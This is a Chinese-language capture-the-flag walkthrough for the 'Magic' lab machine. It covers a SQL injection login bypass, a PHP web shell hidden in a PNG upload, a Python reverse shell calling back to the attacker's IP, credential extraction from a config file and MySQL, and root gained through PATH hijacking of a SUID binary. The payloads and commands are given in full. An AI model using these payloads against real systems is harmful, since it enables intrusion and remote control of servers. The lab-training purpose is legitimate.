[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+环境变量劫持权限提升

信息收集

IP Address	Opening Ports
10.10.10.185	TCP:22,80

$ nmap -p- 10.10.10.185 --min-rate 1000 -sC -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Magic Portfolio
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SQLI & 文件上传

$ gobuster dir -u 'http://10.10.10.185/' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -b 403,404 -x php,txt,html

Apache2.4.x中间件存在一个向上解析漏洞

http://10.10.10.185/login.php

username:admin' or '1'='1
password:xxxx

上传文件

POST /upload.php HTTP/1.1
Host: 10.10.10.185
Content-Length: 365
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.185
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryRSRyaClLcBoHRDRp
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.185/upload.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ld7t5k74b1gjfaaevqcu33hcu5
Connection: close

------WebKitFormBoundaryRSRyaClLcBoHRDRp
Content-Disposition: form-data; name="image"; filename="Screenshot_2024-08-08_08_28_47.php.png"
Content-Type: image/png

‰PNG


<?php system($_GET['cmd']); phpinfo(); ?>
------WebKitFormBoundaryRSRyaClLcBoHRDRp
Content-Disposition: form-data; name="submit"

Upload Image
------WebKitFormBoundaryRSRyaClLcBoHRDRp--

通过主页提供的图片地址可以找到文件

curl 'http://10.10.10.185/images/uploads/Screenshot_2024-08-08_08_28_46.php.png?cmd=python3+-c+%27import+socket%2csubprocess%2cos%3bs%3dsocket.socket(socket.AF_INET%2csocket.SOCK_STREAM)%3bs.connect((%2210.10.16.24%22%2c10034))%3bos.dup2(s.fileno()%2c0)%3b+os.dup2(s.fileno()%2c1)%3bos.dup2(s.fileno()%2c2)%3bimport+pty%3b+pty.spawn(%22%2fbin%2fbash%22)%27'

跳关 & TRPP00F

幸运的是可以利用TRP00F进行关卡绕过,直接从www用户到Root

https://github.com/MartinxMax/trp00f

$ python3 trp00f.py --lhost 10.10.16.24 --lport 10011 --rhost 10.10.16.24 --rport 10035 --http 9999

www-data to theseus

$ cat /var/www/Magic/db.php5

username:theseus
password:iamkingtheseus

通过chisel将3306转发

$ mysql -h 127.0.0.1 -utheseus -p

MySQL [Magic]> select * from Magic.login;

password:Th3s3usW4sK1ng

$ su theseus

User.txt

0f8c7dc6b4de6fc370a9d193350ce15c

权限提升

$ find / -perm -4000 -type f 2>/dev/null

$ strings /bin/sysinfo

环境变量劫持

theseus@magic:~$ echo '/bin/bash'>/tmp/cat;chmod +x /tmp/cat
theseus@magic:~$ export PATH=/tmp:$PATH
theseus@magic:~$ sysinfo

Root.txt

9f8904b0558514cb9b60c6c6985dddbd